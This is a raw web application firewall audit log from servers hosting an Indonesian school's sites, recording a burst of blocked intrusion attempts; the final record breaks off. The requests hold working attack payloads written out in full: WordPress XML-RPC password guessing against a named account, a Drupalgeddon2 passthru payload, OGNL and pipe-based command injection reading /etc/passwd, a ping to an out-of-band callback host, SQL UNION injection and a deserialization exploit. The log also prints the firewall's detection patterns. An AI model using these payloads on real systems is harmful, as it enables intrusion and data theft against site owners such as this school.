35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1527 User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --36358159-C-- system.multicall methodName wp.getUsersBlogs params wakasarpras wakasarpras1234 --36358159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36358159-E-- --36358159-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748297796089503 7887 (- - -) Stopwatch2: 1748297796089503 7887; combined=5931, p1=514, p2=5248, p3=0, p4=0, p5=101, sr=92, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36358159-Z-- --e34b1b07-A-- [27/May/2025:05:20:18 +0700] aDTpIt6cNBpj1JOkpQlK0wAAAFI 103.236.140.4 48516 103.236.140.4 8181 --e34b1b07-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1526 User-Agent: DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --e34b1b07-C-- system.multicall methodName wp.getUsersBlogs params wakasarpras wakasarpras123 --e34b1b07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e34b1b07-E-- --e34b1b07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748298018070519 5178 (- - -) Stopwatch2: 1748298018070519 5178; combined=3650, p1=353, p2=3179, p3=0, p4=0, p5=69, sr=60, sw=49, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e34b1b07-Z-- --a01f4c43-A-- [27/May/2025:05:21:03 +0700] aDTpT1uSH_Spa4YU2ZmqIAAAAM4 103.236.140.4 48520 103.236.140.4 8181 --a01f4c43-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1527 User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --a01f4c43-C-- system.multicall methodName wp.getUsersBlogs params wakasarpras wakasarpras2022 --a01f4c43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a01f4c43-E-- --a01f4c43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (1+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748298063550356 7397 (- - -) Stopwatch2: 1748298063550356 7397; combined=5747, p1=450, p2=5086, p3=0, p4=0, p5=121, sr=89, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a01f4c43-Z-- --a8f5ef2f-A-- [27/May/2025:05:42:28 +0700] aDTuVN6cNBpj1JOkpQlK8gAAAE4 103.236.140.4 48626 103.236.140.4 8181 --a8f5ef2f-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 209.38.208.202 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 209.38.208.202 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a8f5ef2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8f5ef2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748299348091771 711 (- - -) Stopwatch2: 1748299348091771 711; combined=265, p1=228, p2=0, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8f5ef2f-Z-- --2b62c612-A-- [27/May/2025:05:55:10 +0700] aDTxTt6cNBpj1JOkpQlLBwAAAFg 103.236.140.4 48704 103.236.140.4 8181 --2b62c612-B-- POST /account HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 100 User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 152791997 --2b62c612-C-- name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat%20%2Fetc%2Fpasswd')]=eiszm --2b62c612-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b62c612-E-- --2b62c612-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /account"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748300110295267 1874 (- - -) Stopwatch2: 1748300110295267 1874; combined=511, p1=350, p2=131, p3=0, p4=0, p5=29, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b62c612-Z-- --0a2edf2f-A-- [27/May/2025:05:55:10 +0700] aDTxTt6cNBpj1JOkpQlLBQAAAFE 103.236.140.4 48688 103.236.140.4 8181 --0a2edf2f-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 631 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 70846054 --0a2edf2f-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; 
name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --0a2edf2f-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a2edf2f-E-- --0a2edf2f-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748300110292937 5424 (- - -) Stopwatch2: 1748300110292937 5424; combined=3631, p1=421, p2=3133, p3=22, p4=29, p5=25, sr=68, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a2edf2f-Z-- --756d9232-A-- [27/May/2025:05:55:10 +0700] aDTxTt6cNBpj1JOkpQlLBAAAAFI 103.236.140.4 48686 103.236.140.4 8181 --756d9232-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 16 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168708058 --756d9232-C-- whatever-content --756d9232-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --756d9232-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748300110292877 5999 (- - -) Stopwatch2: 1748300110292877 5999; combined=4200, p1=587, p2=3539, p3=20, p4=22, p5=32, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --756d9232-Z-- --7b958b45-A-- [27/May/2025:05:55:10 +0700] aDTxTluSH_Spa4YU2ZmqMwAAANU 103.236.140.4 48700 103.236.140.4 8181 --7b958b45-B-- POST /xmlpserver/ReportTemplateService.xls HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 96 User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: text/xml; charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168868888 --7b958b45-C-- --7b958b45-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b958b45-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748300110294436 4654 (- - -) Stopwatch2: 1748300110294436 4654; combined=3227, p1=381, p2=2770, p3=22, p4=25, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b958b45-Z-- --8a50077f-A-- [27/May/2025:05:55:10 +0700] aDTxThLFq2VRfSzm6b8O3QAAAIM 103.236.140.4 48724 103.236.140.4 8181 --8a50077f-B-- GET /card_scan.php?No=30&ReaderNo=%60ping%20d0qa44pgpeoi1bmoheagfbhthd7m65bib.oast.live%60 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/15E148 Safari/604.1 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166635708 --8a50077f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8a50077f-E-- --8a50077f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: `ping found within ARGS:ReaderNo: `ping d0qa44pgpeoi1bmoheagfbhthd7m65bib.oast.live`"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748300110310509 1582 (- - -) Stopwatch2: 1748300110310509 1582; combined=481, p1=322, p2=129, p3=0, p4=0, p5=29, sr=67, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a50077f-Z-- --0b909850-A-- [27/May/2025:05:55:10 +0700] aDTxTt6cNBpj1JOkpQlLCQAAAEA 103.236.140.4 48728 103.236.140.4 8181 --0b909850-B-- POST /password_change.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 73 User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166620317 --0b909850-C-- user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 --0b909850-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b909850-E-- --0b909850-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /password_change.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748300110310913 1879 (- - -) Stopwatch2: 1748300110310913 1879; combined=569, p1=356, p2=186, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b909850-Z-- --cbd04813-A-- [27/May/2025:05:55:10 +0700] aDTxThLFq2VRfSzm6b8O3gAAAIU 103.236.140.4 48724 103.236.140.4 8181 --cbd04813-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167871123 --cbd04813-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cbd04813-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748300110468524 2119 (- - -) Stopwatch2: 1748300110468524 2119; combined=920, p1=337, p2=551, p3=0, p4=0, p5=32, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbd04813-Z-- --f24a642d-A-- [27/May/2025:05:55:10 +0700] aDTxTt6cNBpj1JOkpQlLCgAAAEI 103.236.140.4 48746 103.236.140.4 8181 --f24a642d-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168868894 --f24a642d-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --f24a642d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f24a642d-E-- --f24a642d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748300110469232 3007 (- - -) Stopwatch2: 1748300110469232 3007; combined=1665, p1=349, p2=1282, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f24a642d-Z-- --c075c15f-A-- [27/May/2025:05:55:10 +0700] aDTxTluSH_Spa4YU2ZmqNgAAAMI 103.236.140.4 48720 103.236.140.4 8181 --c075c15f-B-- POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 8004 User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 168708064 --c075c15f-C-- 
stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%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%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%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%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e --c075c15f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c075c15f-E-- --c075c15f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)((?:\\bx(?:link:href|html|mlns)|!ENTITY\\b.{0,399}?\\b(?:SYSTEM|PUBLIC)|\\bdata:text\\/html))" at ARGS:stagingTaskData. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "170"] [id "213060"] [rev "7"] [msg "COMODO WAF: XSS Filter - Category 3: Attribute Vector||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748300110468424 13673 (- - -) Stopwatch2: 1748300110468424 13673; combined=12475, p1=417, p2=12029, p3=0, p4=0, p5=28, sr=73, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c075c15f-Z-- --811fa764-A-- [27/May/2025:05:55:11 +0700] aDTxT2TuEZUBy5rh0sZ7ngAAAAo 103.236.140.4 48756 103.236.140.4 8181 --811fa764-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 Macintosh Intel Mac OS X 10_15_7 AppleWebKit/605.1.15 KHTML like Gecko Version/18.3 Safari/605.1.15 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168708070 --811fa764-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --811fa764-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
